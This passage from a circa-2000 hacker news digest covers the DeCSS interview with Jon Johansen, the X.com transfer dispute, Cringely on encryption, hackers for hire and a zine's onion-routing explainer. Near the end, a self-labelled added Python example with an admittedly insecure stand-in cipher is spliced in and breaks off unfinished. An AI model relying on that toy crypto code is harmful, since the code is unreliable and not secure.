LinuxWorld: Did they question you at your house?

Jon Johansen: No. They took me to the local police station. But my father was sick, so they questioned him here at home.

LinuxWorld: But they just took you in for questioning -- they didn't arrest you or anything like that?

Jon Johansen: Well, the biggest Norwegian newspaper regarded this as an arrest, since they hadn't told us that they were coming and they brought me in. So the biggest Norwegian newspaper looked upon that as an arrest.

LinuxWorld: But did they give you a choice to not go in for questioning?
Jon Johansen: Well, of course I do have the right to have an attorney present. So I [could have] told them that I did not want to do it without an attorney, [and] they would have had to call my attorney and schedule an appointment.

LinuxWorld: And you didn't do that.

Jon Johansen: No, I didn't do that.

LinuxWorld: Why?

Jon Johansen: Basically, because I didn't have anything to hide. So I decided to cooperate.

LinuxWorld: The code that you wrote -- now, is it called DeCSS or is it CSS-auth?

Jon Johansen: It's called DeCSS.

LinuxWorld: OK. Because I've seen conflicting media reports on that, and other things. Like, some say that you are 15, others say you are 16.

Jon Johansen: I'm 16 now, I was 15 when it happened ... and the encryption code wasn't in fact written by me, but written by the German member. There seems to be a bit of confusion about that part.

LinuxWorld: The other two people that you had worked with to make the player are remaining anonymous -- is that right?

Jon Johansen: Yes, that is correct.

LinuxWorld: Do you think they will try to find out who they are from the data on your computer?

Jon Johansen: Yes, probably. They also asked what I knew about them. But I don't have the identity of any of them. I only had the nicks that they used on Internet Relay Chat.

LinuxWorld: And did you give those up?

Jon Johansen: Well, lately they have been changing nicks from time to time. So I gave one of the nicks they had used before.

LinuxWorld: Do you know why they want to remain anonymous?

Jon Johansen: They are both a lot older than me, and they are employed. So I guess they just didn't want the publicity, and they were perhaps afraid of getting fired.

LinuxWorld: And why is your father involved in this?

Jon Johansen: Basically because he owns the domain [at which] my Webpages were located.

LinuxWorld: And how do your parents feel about this whole thing?

Jon Johansen: They consider it [to be] just as stupid as I do. The charge is totally off-topic.
It doesn't have anything to do with reality.

LinuxWorld: Do you know why they took your cell phone?

Jon Johansen: I asked them why, and they said that they considered it to be so advanced that they had to take it in, because it was a Nokia 91-10. And I did have, in fact, a backup of the source on it.

LinuxWorld: And do you know what is going to happen next?

Jon Johansen: They are currently investigating, and I still haven't received my computers back. So I have ordered a new one today, which I will be receiving on Friday. Which is a bit too late, because ABC News is coming tomorrow, and I was supposed to demonstrate DVD playback under Linux. So I'm going to call some people now and try to get hold of a computer with a DVD-ROM and get Linux installed on it.

LinuxWorld: So, can DeCSS in fact in any way be used for pirating? I mean, I realize that isn't the purpose for which it was written.

Jon Johansen: Well, yes, it can be used for pirating. Because you can decrypt a DVD disk and put it on your hard drive and then you can convert it, say, to VCD and then post it on the Internet. But tools to do that had already been available on the Internet, long before DeCSS, which was also a complete digital solution which gave you the same quality. So DeCSS didn't introduce anything new for pirating and had already been available.

LinuxWorld: So why do you think they are going after you, and not the authors of the other tools?

Jon Johansen: Well, the authors of the other tools are, as far as I know, anonymous. And [in] the charge, they say that the encryption is copy protection. But that's not correct at all. Anyone with a little computer experience knows that anything can be copied bit-by-bit with the right equipment.

LinuxWorld: And the authors of the other tools didn't break the encryption? Those previous tools had been written for the Windows platform, is that right?

Jon Johansen: Yes.
There was one tool, I think it was called DVD-rip, which I believe actually hacked into the Xing DVD player and then, when the Xing DVD player had decrypted the MPEG stream, the DVD-rip utility dumped that stream to disk and you had yourself an unencrypted DVD movie.

LinuxWorld: Well, it seems then all the more that they should be going after those other authors.

Jon Johansen: I guess it is because those other tools haven't received any media attention. But perhaps they don't even know about them -- but I would think that they do, because they are not that stupid.

LinuxWorld: Why did you decide to come forward and not to remain anonymous?

Jon Johansen: We discussed it in the group and they thought it was OK, and I think the first reporter I talked to was from Wired. I think it was Declan [McCullagh], and he asked me if he could publish my name, and since we had already talked it over in MoRE, I said yes.

LinuxWorld: Are you sorry now that you did?

Jon Johansen: Not really, because I think the fight we are now fighting is a very important fight for free speech and for the open source community.

LinuxWorld: Why is it so important?

Jon Johansen: Basically, if reverse engineering is banned, then a lot of the open source community is doomed to fail. Because [you need to reverse-engineer] when creating software for compatibility with, for example, Microsoft Windows. For example, Samba was totally dependent on reverse engineering. Of course, the whole computer industry was allowed to reverse-engineer IBM's BIOS.

LinuxWorld: What was your reaction to the injunctions in the US?

Jon Johansen: I was a bit surprised, but then I read about how EFF [the Electronic Frontier Foundation] had presented the defense. And, if what I read on Slashdot about that was true, then I don't understand how exactly EFF could have argued that way.

LinuxWorld: Why?
Jon Johansen: Well, what I read on Slashdot was that they basically said that the encryption was bad, and it was kind of their fault. And I don't understand why they used those arguments.

LinuxWorld: What kind of arguments would you have expected, or what kind of arguments do you think might have been better?

Jon Johansen: I would have expected for them to try to explain to the court that this had nothing to do with copying, because encryption does not prevent copying -- which the DVD CCA [Copy Control Association] and MPAA are claiming. And everybody knows that even if something is encrypted you can still copy it if the reading of the data goes through decryption.

LinuxWorld: At the hearing I attended, the defense did argue that the DVD encryption was flawed. At the same hearing, the plaintiffs had some really, some pretty strong feelings about the way people have been acting when they repost the code. Do you know about that?

Jon Johansen: I did actually read on Slashdot where the plaintiffs had actually read from Slashdot debates.

LinuxWorld: Exactly. And they picked out only the ones which were saying things like "fuck the law." And so they picked those out on purpose and they said, "Look at these people. They don't want to play back movies. They are saying 'fuck the law.'" So do you have anything to say to people about that?

Jon Johansen: Well, that's really sad that they can't behave, because they should have known that the plaintiffs would have used something like that against us. They should stop doing things like that and help inform the media that this has nothing to do with copying but [rather has to do] with playback.

LinuxWorld: How best can people help to do that?

Jon Johansen: Well, first of all they could head over to OpenDVD.org, and see what's written there, and then perhaps call or email their local media, and inform them about the case.

LinuxWorld: Thanks, Jon, for talking to us. We wish you the best of luck.
@HWA

81.0 HNN: Feb 1st: X.com Denies Security Breach
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN
http://www.hackernews.com/

contributed by Weld Pond
Online bank X.com has denied recent media reports of a security breach. The company does acknowledge that six unauthorized transactions totaling less than $10,000 combined had taken place sometime between mid-December and mid-January. According to the company these suspicious transactions do not constitute a security breach but are in fact a policy issue. (Bad policy can lead to poor security.)

Newsbytes
http://www.cnnfn.com/news/technology/newsbytes/143017.html

No Security Breach Occurred, Online Bank Says

January 31, 2000: 2:23 p.m. ET

SAN FRANCISCO, CALIFORNIA, U.S.A. (NB) -- By Kevin Featherly, Newsbytes. Officials at X.com are crying foul at the way an alleged "security breach" was played in the media last week, after reports surfaced that suspected thieves had accessed the online bank's Web site and transferred money to X.com accounts from unrelated accounts in other banks.

Bill Harris, X.com's CEO and the former CEO of Intuit, told Newsbytes this weekend that there was never a security breach or software bug in the X.com online banking system. Also, he said, the system was changed to a more tightly controlled one prior to reports surfacing in the media.

Harris acknowledged that six unauthorized transactions totaling less than $10,000 combined had taken place sometime between mid-December, when the company launched for business, and mid-January, when the system was changed. He acknowledged that the six transactions were "suspicious," and said they are being investigated.

"We had these six instances where people said (they) had unauthorized transfers," Harris said. "As a result, based on our own internal analysis, we instituted as of (Jan. 22) a policy where no transfers (were possible) without a voided check."

Until Dec. 22, Harris said, it was possible for customers to make transactions of up to $2,500 to or from other banks via the Web without having to send in voided copies of checks by fax. For two weeks or so at the beginning of the company's history, it had been possible to make a maximum of $15,000 in transfers to or from other banks without sending in voided checks. Now, all transactions must be preceded by a faxed copy of a voided check.

The system fell under scrutiny last week after the New York Times ran a story detailing the unauthorized money transfers, and referring to the issue as a security breach.

Meanwhile, Newsbytes quoted Elias Levy, chief technology officer at San Francisco-based SecurityFocus.com, who said that his company confirmed there was a problem by setting up an account with X.com, and attempting to perform a transfer from one SecurityFocus staff member's bank account into an X.com account created in another employee's name. Within a couple of days, the money transfer went through, Levy said. SecurityFocus.com then alerted X.com to the problem. But the bank had already changed the system to a more restrictive one by then, Levy said.

X.com's Harris said that nobody from SecurityFocus talked to any management staff at the online bank, but said it might be accurate, as Levy indicated, that he had talked to bank technicians to alert them to what they had done. In any case, Harris said, there was never a security problem.

"The issue is one of policy and what policy do we use to allow people to do electronically," Harris said. "The policy that we had been using was one where, up to a certain limit people were allowed to do electronic fund transfers to and from their own bank account by entering in the numbers of those bank accounts. That's actually a practice that is fairly common."

Harris compared the practice to the method many e-commerce sites use to transact with credit card holders.
Many times, he said, purchases are made in which there is no physical evidence verifying a cardholder's validity. The account numbers are inputted into Web forms, and the transaction takes place.

"Obviously, with either a credit card or bank account number, if you accept that information from an individual without seeing the physical card or physical check, there's a chance that the person might get it wrong - mis-enter it or misspeak or misinterpret the wrong number," Harris said. "Or, they may consciously provide the wrong number."

Harris has a point, says Rob Leathern, a Jupiter Communications analyst familiar with online banking. Bank fraud is fairly common in the traditional world, he said, and if there were only six unauthorized transactions from X.com, the percentage of their clients victimized by fraud may actually be smaller than is typically found in the brick-and-mortar banking industry.

However, reality is one thing, perceptions another. The issue at X.com was sufficiently severe to prompt David Kennedy, director of research services at computer security firm ICSA.net, to call on the company to go out of business.

Such draconian measures are hardly called for, says Leathern, who thinks the matter has been blown out of proportion in the press. Still, being an online bank with a high-profile CEO makes the company vulnerable to such accusations, Leathern said. And because the public at large is not yet comfortable with online banking, the bar for security must be set higher at companies like X.com, he said.

"I do think that they do need to pay close attention to this kind of stuff, because there is attention," Leathern said. "With a bank, someone is trusting you with their money, so they need to be real careful about the way they manage the consumer's expectations and their concerns. I think to a certain extent, they have to pay more attention to stuff."

X.com is a division of La Jara, Colo.-based First Western National Bank.
X.com is on the Web at http://www.x.com/ .

Reported by Newsbytes.com, http://www.newsbytes.com .

@HWA

82.0 HNN: Feb 1st: Microsoft Security, An Oxymoron?
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN
http://www.hackernews.com/

contributed by Code Kid
In the last two months Microsoft has issued 16 security advisories on its own products; other companies have issued additional advisories as well. So what is the problem? Is it, as Microsoft claims, the wide deployment of Microsoft products or is it the ravages of an unfriendly press?

Sm@rt Reseller - via Excite News
http://news.excite.com/news/zd/000128/12/whats-wrong-with

<article vanished!>

@HWA

83.0 HNN: Feb 1st: Cringely, Defcon, E-Commerce and Crypto
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN
http://www.hackernews.com/

contributed by Joey
Cringely, who normally has useful stuff to say, delivers a muddled message on the state of ecommerce and security. He says that no system is perfectly secure, and that major intrusions are inevitable. Unfortunately, he then draws an absolute relationship between key length and security, never mentioning implementation as being a factor in the value or safety of crypto products. (He also confuses trashing with social engineering. It is depressing to see a programmer/journalist who was at the first Defcon deliver such a mediocre piece.)

PBS
http://www.pbs.org/cringely/pulpit/pulpit20000127.html

That's Where the Money Is
Hold Onto Your Wallet, Because Computer Crime Is Growing Up

By Robert X. Cringely

Several years ago at the very first DefCon hackers' conference in Las Vegas, Dan Farmer sat like a rock star in the back of the meeting room in the old Sands Hotel. Dressed entirely in black leather with shoulder length flaming red hair, Dan sat trading kisses with two girls while the other speakers droned on. In a culture where nerds speak of women generally as a concept rather than an experience, to see a techie with groupies was a phenomenon.
It got even better when Dan finally took his turn at the podium and I learned his position in those days was head of network security for Sun Microsystems. And his message to this room half-filled with young computer criminals and half-filled with Feds trying to not look like Feds was that their efforts were pathetic and boring. Farmer urged them, if they were going to insist on trying to break into his network, that they at least come up with techniques that were more clever, more deserving of his attention.

This scene has returned to my memory many times since, but especially lately as a new batch of computer criminals seems to be at work. You've seen the stories. Moving on from simple destruction and mayhem, the new game is blackmail. Some smart kid steals a few thousand passwords or credit card numbers, then uses that theft to extort money from ISPs and e-commerce sites. Only it doesn't work. So far as we know, the ISPs and e-commerce people aren't paying up. Or are they? Whether they are or not, I am sure that Farmer would find it boring. I know I do.

Since I have in the past known a few people operating on the shady side of computer law, my take on this extortion racket is that they are trying to create what they believe to be a victimless crime. Of course it isn't victimless at all. The other attraction is the juvenile satisfaction of trumpeting the crime: "I did this to you, now pay up." Professional criminals would rather their crime go undetected. These are not professionals.

What we are seeing, though, is a progression of criminal acts headed in an escalating direction. There will come a time when ego will be put aside and somebody is going to steal some major bucks. And if the FBI or any other organization says it can't be done, well, they are wrong. It will happen.

The point of this column is to give the lay reader a sense of where we currently stand in this war to protect our bytes from being bitten.
This is another one of those columns the nerds will see as simplistic and useless, except I pretty much guarantee a close reading will tell most of them something they didn't know before.

So, in a world where money isn't greenbacks anymore but electrons flowing through a global network, where teenagers seem to crack Pentagon computers with impunity, where most of us have no idea at all how any of this is accomplished or how to protect ourselves, is our wealth really secure? What's to keep some kid from stealing our IRAs and Keoghs, our CDs and mutual funds, even our identities? Just how safe is our information and, by implication, our money? Are the ways we do business going to have to change?

The bad news says that nothing is secure. With enough effort, every technology that we have to protect the data we call money can be broken. The good news is that it nearly always costs more to gain access to our holdings than those holdings are worth. If it costs $100,000 to steal $10,000, nobody will even bother -- or that's the theory.

What keeps you from losing your credit card number to some thief when you buy a book or CD at Amazon.com? This is the key question that dogs the proponents of consumer E-commerce. Forget that we hand the same credit card without hesitation to a waiter who might be a career felon, or give the number over the phone to a salesperson who might be working on a telephone bank in some minimum-security prison. People distrust machines, and they are not at all embarrassed to express that distrust.

So what's to keep Amazon.com or someone else from stealing our information? Beyond simple morality and ethics, there are two things keeping Amazon.com from robbing us blind: Amazon CEO Jeff Bezos wants to remain a billionaire, and our credit-card information is scrambled, or encrypted, before it is sent over the Net. Bezos knows he makes more money by selling books than he could by stealing from his customers, so he doesn't steal. That keeps Amazon honest.
Scrambling the credit card information makes an honest person of everyone else who might be in a position to snoop on your shopping session -- say, a technician at your Internet service provider. To make sure your credit card numbers remain private, use only Internet merchants that offer secure transactions. Before you push that "send" key, make sure the URL line on your web browser starts with "https," not just "http," or ends with "shtml." These mean your outgoing data is being encrypted.

Before we get too far into data encryption, understand that the single most popular technique for gaining access to online data is called by its proponents, "social engineering." This is strictly non-technical. Social engineering is a crook tricking us into giving him our Internet password or finding it by searching wastebaskets or looking over shoulders. Why bother to bring in the heavy computing firepower to crack a password if people will hand theirs over to someone who claims to be a customer service representative from the Internet service provider? This is why America Online makes such a point of reminding its users that the company will never ask them for their passwords. Social engineering is a greater threat than all the criminal supercomputers in the world.

Nearly all Internet commerce is protected, in whole or in part, by cryptographic software derived from the late-1970s work of three mathematicians at MIT -- Ronald Rivest, Adi Shamir, and Leonard Adleman. The Rivest, Shamir, Adleman algorithm, generally known as simply RSA, represents both a method of scrambling a message between two parties in a way that allows the message to be decoded only at its intended destination and a way of identifying the parties to each other. The patented RSA algorithm comes in several levels of security, defined by the size of prime numbers that are used to generate both the encoding and decoding keys. Nearly all RSA codes use at least 512-bit numbers.
(If your browser mentions 40-bit or 128-bit, this is just geekspeak for a complementary technology that works with RSA, trust me.) That's plenty secure for most purposes, though these days many web browsers and serious e-commerce sites have stepped up to 1,024-bit RSA, and the super-paranoid can encode their e-mail messages with 2,048- or even 4,096-bit encryption. More bits means it takes longer to encrypt and decrypt data, but the data is much more secure.

Some forms of encryption are cracked through a brute-force method that simply applies a mathematical test to the zillions of possible solutions until one is found that can decode the target message. RSA requires more sophisticated approaches. Five-hundred-twelve-bit RSA was cracked for the first time last August by 292 computers running on and off for seven months -- a total of 35 years of computing time. What is significant about this is that earlier in this decade, the best guess said it would take 50,000 years of computing time to crack 512-bit RSA. So it would take a massive effort to crack your credit card transaction, and that's only if your transaction could be isolated from the millions of others happening each day. On the face of it, e-commerce looks pretty secure.

But there is a dark side to all this, which is the ability to use the Internet itself as a means to gang thousands, even millions, of computers together to attack such a problem, possibly without the computer owners' being aware their machines are being used. Take comfort that such firepower would more likely be applied to cracking some giant interbank money transfer than to gaining access to your Discover card.

To keep our money secure, the trend is toward harder and harder encryption using more bits. In this way, it is still quite easy to remain comfortably ahead of the criminal community. RSA 1,024-bit encryption is still wondrously secure, to say nothing of 2,048 and 4,096.
For the spies among us who don't even trust RSA, there are whole new classes of codes based on elliptical mathematical functions that look to be even harder to crack. But just as cracking 512-bit RSA dropped from 50,000 years of computing time to 35 in less than a decade, the real concern among users of cryptography is that a breakthrough -- a secret breakthrough -- will allow devices to accomplish in seconds what used to take years. Just such a device was described last fall in a now discredited story in The Times of London. The handheld device was supposed to have been invented at Israel's Weizmann Institute of Science and was claimed to crack 512-bit RSA in microseconds.

Such a device is probably decades away, but then cracking 512-bit RSA was supposed to take 50,000 years and turned out not to. There is no way of knowing when a breakthrough in quantum computing or another field will make such a device possible. But I can tell you how to know when it has happened. The inventors of such a device wouldn't be content with stealing credit card numbers or siphoning pennies from checking accounts. These would be big thinkers. They would have the ability to literally take control of the world financial system with their device. So we'd awaken one day to a back-to-the-future moment in which some gargantuan shift of resources would have taken place in a manner that would be difficult or impossible to reverse. These are, after all, only the electronic equivalent of ledger entries we are talking about. And on that fateful morning we would wake to find that Russia was suddenly the economic superpower and that the U.S. was begging for foreign aid. Now THAT would impress Dan Farmer.

@HWA

84.0 HNN: Feb 1st: Cold War Spies For Hire
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com/

contributed by Apocalypse Dow

With the cold war all but over, international spies need new employment. Many of them are earning a living snooping around on the internet.
With their services for hire anyone can get the information they desire.

MSNBC
http://www.msnbc.com/news/364412.asp

Cybersnoops: Hackers for hire
Former spies and cops sell surveillance skills on the open market

Hundreds of overseas agents who were dumped by the CIA in the budget cuts of the mid-'90s are spying for profit on the Internet.

By David Ignatius
WASHINGTON POST

WASHINGTON, Jan. 31 — So you think your computer communications are safe and secure? Hah! You poor, deluded, vulnerable fool. Experts in the security business confide that most computer networks are wide open to attack by dedicated hackers. Indeed, they describe some real-world electronic assaults that would make your bytes turn into bits.

WANT TO BREAK into one of Switzerland’s most famous private banks and look at its accounts? Not a problem. Want to break into the computer of a key government agency of a big European country and read messages tasking its security officers? Not a problem. Want to crack corporate networks and read the e-mail traffic? Not a problem. In fact, that’s so easy it’s done routinely.

HACKERS FOR HIRE

We’re not talking here about electronic intercepts by the National Security Agency or black-bag jobs by the CIA, mind you. These operations are conducted by the growing global network of private security consultants, using sophisticated hacking tools that most of us don’t begin to understand.

An example of the hackers’ tool kit is something called a “packet sniffer.” Once the hacker gains access to the electronic transmissions passing through a computer network (which isn’t as hard as you might think) the packet sniffer allows him to read the electronic bundles of information — those little ones and zeros streaming over the Net — and translate them into readable computer files. An apprentice hacker can download the software needed for a packet sniffer from one of many sites on the Net.
IN FROM THE COLD

'Companies are much more vulnerable to electronic attack than they realize: corporate firewalls are laden with hidden trapdoors that give access to hackers.'

What’s happening, in effect, is the privatization of some of the most powerful tools traditionally used by intelligence agencies — which allow them to overhear our conversations and read our mail. The new privateers are mostly former spies and law enforcement officers — from Washington to Paris to Moscow to Canberra — who are out now, and offering their skills on the open market. They’re working with former colleagues and liaison contacts around the world — and with the hacker underground — to get the information they need.

“The Cold War is over,” explains one member of this private security brotherhood. “People in police and security services are just trying to make money.”

One ripe source of information is the hundreds of agents overseas who were dumped by the CIA in the budget cuts of the mid-’90s. Many of them are freelancing now.

HOW TO HIRE A SPY

If you want access to this network, you can start by contacting one of the high-powered Washington or New York law firms. They, in turn, will contact a private security firm, which will contact a consultant, who will contact another consultant, who will work with hackers, cops, second-story artists — whoever is needed to get the job done. Typically, the person who initiates a request for information at one end of the chain has no idea who actually obtains it, or what methods were used. The sources are shielded by what are known in the spy world as “cut-outs.”

If you saw the 1998 movie “Ronin,” you have an idea of how the security brotherhood works. The Ronin are modern-day equivalents of samurai warriors who have been decommissioned after a war and are wandering the landscape looking for work. The movie’s plot is fanciful, but the portrait it draws of a fraternity of ex-spooks for hire is quite accurate.
COUNTER-INTELLIGENCE

Companies that want to protect themselves against these electronic attacks should consider investing in counter-intelligence. An example of what’s available comes from Michael L. Puldy, who heads IBM’s Emergency Response Service. He runs a group of about 100 people worldwide, who help IBM clients clean up the damage from electronic break-ins and try to prevent them from happening in the first place.

Puldy explains that companies are much more vulnerable to electronic attack than they realize. They may think they’re protected by so-called “fire walls” that screen who gets into the network. But if the fire-wall software is installed right out of the box, it usually contains default passwords and other trapdoors that allow smart hackers to get in. Puldy’s group mainly does electronic “perimeter checks,” looking for holes in a company’s network, along with installing “intrusion detection monitors,” which sense when a hacker is trying to break in.

ETHICAL HACKING

But IBM also offers a more aggressive “Ethical Hacking Service,” which for a fee will actually break into your system and show just how vulnerable it is. Puldy says that IBM’s ethical hackers can penetrate more than 75 percent of the systems they attack. Once inside, they can find password files, break into the corporate e-mail server and read everyone’s mail — sometimes even get into the CEO’s hard drive and read his most private files.

Packet sniffers are the enemy, in Puldy’s world. He says that cable modems are especially vulnerable, because given most existing cable technology, it’s easy to read the other computers on a neighborhood cable loop.
“If you’re on the neighborhood ring, you can put a sniffer on the cable and watch everything I do on my computer — stock trades, passwords, e-mails, everything,” says Puldy. It’s harder to crack “digital subscriber line” or DSL technology that’s used to provide high-speed connections over phone lines — but not impossible. “Given enough time and effort, you can break into anything you want to,” says Puldy.

Civil libertarians still seem to focus their angst on privacy threats from government intelligence and law-enforcement agencies, but they’re way behind the time. Like everything else in the global economy, snooping has been privatized.

David Ignatius is a novelist and associate editor of The Washington Post, who writes about business and the economy.

© 2000 The Washington Post Company

@HWA

85.0 HNN: Feb 1st: More Ezines Available
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com/

contributed by napalm and Xenos

Issue #3 of Napalm and Issue #4 of Digital Defiance have been released.

Napalm
http://napalm.firest0rm.org/

Digital Defiance
http://www.hackers.cx

Napalm: Here is ISSUE #1 in its entirety (short release) for a taste of what to expect from this zine:

Napalm
Issue 1 (Sep. 29, 1999)
___________________________________________________________________________

The gh0st.net project: http://www.gh0st.net/index.html
URL of the day: (Computer geek cartoons) http://www.userfriendly.org

All content copyright © 1999 by the individual authors, All Rights Reserved
___________________________________________________________________________

- Editor's Comments
- URLs
- News
- My Life As A Happy Hacker
- Onion Routing
- The gh0st.net Project
- Violence, Censorship, & Our Rights
- Future Issues
- Credits

***********************************************************************
*** Editor's Comments : Kynik
***********************************************************************

For now, I'm just going to borrow the layout I used while I was HH editor. (Which I am no more.) I'll try to make it a little bit more freeform than this first issue, but we'll have to see. I'd like to see this zine diverge a little from the standard 'security info' theme and get into music, news and whatever tickles everyone's fancy. Email me at kynik@gh0st.net for damn near anything. Oh, and send me good links, too.

NOTE: Due to the gh0st.net webserver and mailserver's owner moving very far away soon, the website may be inaccessible for quite some time. You can contact us at napalmzine@hotmail.com until we get everything back up again. Thanks to TF for actually hosting all the web pages and mail server!
***********************************************************************
*** Random good URLs : Kynik
***********************************************************************

The Roskilde music festival in Copenhagen, Denmark
http://www.roskilde-festival.dk/

The OSKit - build your own OS
http://www.cs.utah.edu/flux/oskit/

gh0stOS
http://www.gh0st.net/gh0stOS/

Good source code for neural networks
http://www.geocities.com/CapeCanaveral/1624/

Irish pop-punk
http://www.iol.ie/~brooder

***********************************************************************
*** My Life As A Happy Hacker : Kynik
***********************************************************************

A long time ago (probably 3-4 years) on a computer lab workstation far, far away (ok, it was the Midwest) I discovered the Happy Hacker in my quest for knowledge of the computer sort. I found it after sifting through search engine results of the keyword 'hacker'. I had been inspired by such movies as "Wargames" and "Sneakers" and realized that there was a lot more to this computer thing than Doom and Microsoft Word. Having realized this, I dove headfirst into the web, trying to find a place that suited my wants and actually had an air of intelligence. Many of the sites I found were crude and obviously created by middle-school-aged kids looking to mess with their friends on AOL.

Two things I found caught my attention immediately: Silicon Toad and The Happy Hacker mailing list. I proceeded to download a whole pile of programs from Silicon Toad's site, and played with them on my computer at home, but beyond that, didn't do too much. I checked in on it every once in awhile, until the site disappeared. I kept on getting the happy hacker newsletter, and found out how to do some neat, trivial things such as changing my Windows 95 splash screen for startup and shutdown. Then I began to read about some of the things that people had done with their computers, and against the list founder, Carolyn Meinel.
I didn't think too much about this at the time, but kept my interested fascination with the whole 'hacker culture' as I progressed with my Computer Science degree. I continued to receive the digest, and towards the end of 1998, I got a Happy Hacker digest with a request for a new UNIX editor. Having read most of the info out there about Carolyn Meinel and the general consensus about her, I thought about it carefully before I sent in an application. I realized the stigma that currently goes along with CPM and the Happy Hacker name, but after consideration, I thought I'd try to keep alive the idea that got me into the Happy Hacker in the first place: Knowledge and Ethics.

Granted, CPM is currently more interested in money and promoting herself than educating and instilling ethics, from what I've seen. I emailed her, and asked if the position was still available. She asked me to write a Guide to (Mostly) Harmless Hacking (GTMHH) on any topic I chose. I chose to write a beginner's guide to C++, since there already was one for C. Well, I sent her a small piece of what I had written, and she advised me that Guide submissions are generally much longer. So I set off to flesh it out and expand on the parts she said were somewhat lacking.

I got about 2/3 of the way through it, and grad school and work took precedence. A few weeks later, totally to my surprise, I got an email from Carolyn asking me if I wanted the position. I said yes, we exchanged our PGP keys, I got the passwords to the unixeditor POP account, and I started reading submissions and putting them together to form the Happy Hacker UNIX digest.

To see the digests, as they were submitted to Carolyn, go to the following URL:
http://fire.gh0st.net/hh/index.html

The first few digests were pretty weak, as most of the questions I got were rather bland, and I was still getting the feel of the position. I got very few flames, and a lot of praise.
I realized that I might actually be making a difference to some people, trying to help them understand the basics (and some details) of UNIX and computer security. When I heard that Carolyn had moved the HH mailserver over to an AntiOnline computer, I wasn't thrilled, but I really didn't care all that much at the moment. Keydet89, the windows editor, apparently left because of this, which was rather sad, because he always had good perl snippets in his digests. (Send me an email keydet, if you wanna tell about your experience, or write some articles :)

Then I thought about it. I looked back at AntiOnline's features section, and I thought about JP's article on "Hacker Profiling". Pieces started to fit together. I thought about the possibility that JP was making copies of any mails that I received as a submission and adding them to his pile of material to be filtered and info to be added to the 'hacker database'.

See, a lot of times I'll be sent an email claiming to have broken into a site and wanting to know what to do from there. (Or, someone requests me to break into a site for them -- which I'd consider doing, provided you're paying me and the site is yours.) In the second-last HH digest, I included a link to my PGP key, and an alternate email address that people could write to. I'd say about half of the respondents used the other email address... and 2 or 3 used the PGP key.

I realized that I needed a bit more creative freedom, without eyes peeking over my shoulders. So, I teamed up with some people I had met online, and had been working with for a little while, and offered to create a new zine, with an emphasis on computers, security, and music. I wanted to give the people that needed a certain amount of mentoring a chance to get some people to talk to if they needed help. I found out that there was a similar group of people working on a project similar to the Happy Hacker wargames, but cooler, and I started hanging out with them as well.
So, here ends my Happy Hacker story. I know I've left out some minor details, but don't worry, they weren't that important. Let's have a big round of applause for the gh0st.net and FireStorm guys! Hopefully the projects will pick up soon, and there will be more to see on both the fire.gh0st.net and www.gh0st.net sites.

-Kynikeren

***********************************************************************
*** Onion Routing : Kynik
***********************************************************************

While it seems that the term "Onion Routing" may be copyrighted, I feel that it is a good description of the technology. Onion Routing is an Internet-based system to prevent eavesdropping and traffic analysis. The name "Onion Routing" is appropriate, since it is based upon adding several layers of encryption to a message (and removing them) as it is passed along the network, as one might remove the layers of an onion. (I suppose one could also call it 'artichoke routing' too ;)

This is essential to a network where privacy and anonymity is important. "Well, so what about privacy, everything I'm sending to that site is encrypted with SSL, anyways", you may say. That's all fine and dandy, but chances are, anybody monitoring you knows at least that you've been there, since the destination address is plainly readable in the IP header. That's where the anonymity portion comes in. Someone between you and the website you're visiting is _not_ able to tell (easily) where you're going, or even where you're coming from.

There are two notable systems in use/development today (at least what I've initially found). They are:

Freedom - "Internet Identity Management System"
http://www.zeroknowledge.com/products/

The Onion Router Project (US Naval Research Lab)
http://www.onion-router.net/

There are some differences between the two, but I'm not going to analyze them. Now, how does this all work, you ask?
The scheme is built upon public-key encryption (of varying strengths) and a 'private' network of routers. Basically, your packet doesn't take the direct route across the net like you'd expect it to. Instead, it is sent to a specialized computer which runs the 'onion routing software'. That 'onion router' (OR) hands the packet off to the next designated OR, which continues to forward it on, until the last OR designated finally delivers it to the true destination.

I don't want to get into the mechanics for establishing routes and vendor-specific details like Freedom's Anonymous Mail Proxy, but instead I will explain the generic mechanism that allows you to send anonymous, private traffic across the internet via onion routing.

A fairly good paper, by Goldschlag, Reed and Syverson, entitled, "Onion Routing for Anonymous and Private Internet Connections," does a thorough job of explaining this technology:
http://www.onion-router.net/Publications/CACM-1999.pdf

From the paper:

    Onion Routing operates by dynamically building anonymous connections within a network of real-time Chaum Mixes. A Mix is a store and forward device that accepts a number of fixed-length messages from numerous sources, performs cryptographic transformations on the messages, and then forwards the messages to the next destination in a random order. A single Mix makes tracking of a particular message either by specific bit-pattern, size, or ordering with respect to other messages difficult. By routing through numerous Mixes in the network, determining who is talking to whom becomes even more difficult. Onion Routing's network of core onion-routers (Mixes) is distributed, fault-tolerant, and under the control of multiple administrative domains, so no single onion-router can bring down the network or compromise a user's privacy, and cooperation between compromised onion-routers is thereby confounded.
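The layer-peeling the paper excerpt describes, as an added example that is not code from Kynik's article, from Freedom or from the NRL project: a Python simulation in which the sender wraps a message in one layer per router, and each router strips only its own layer, learning nothing but the next hop. It assumes that each router shares a secret key with the sender (a constructed stand-in for the public-key layer the article describes) and uses a hash-based keystream plus HMAC as a stand-in cipher, which is enough to show the mechanism but is not a secure construction.

```python
"""Toy onion-routing walk-through (added example; not code from Kynik's article,
Freedom or the NRL project).

Constructed assumptions: every onion router (OR) shares a secret key with the
sender, standing in for the public-key layer the article describes, and each
layer is a SHA-256 keystream XOR plus an HMAC tag, a stand-in for a real cipher
(good enough to show the mechanism, not a secure construction).
"""
import hashlib
import hmac
import os

NONCE_LEN = 16
TAG_LEN = 32
SEP = b"\x00"  # terminates the next-hop name inside a layer


def _keystream(key: bytes, nonce: bytes, length: int) -> bytes:
    """Deterministic keystream from (key, nonce): SHA-256 in counter mode."""
    out = bytearray()
    counter = 0
    while len(out) < length:
        out += hashlib.sha256(key + nonce + counter.to_bytes(4, "big")).digest()
        counter += 1
    return bytes(out[:length])


def seal(key: bytes, plaintext: bytes) -> bytes:
    """Add one layer: nonce || ciphertext || HMAC-SHA256 tag over nonce+ciphertext."""
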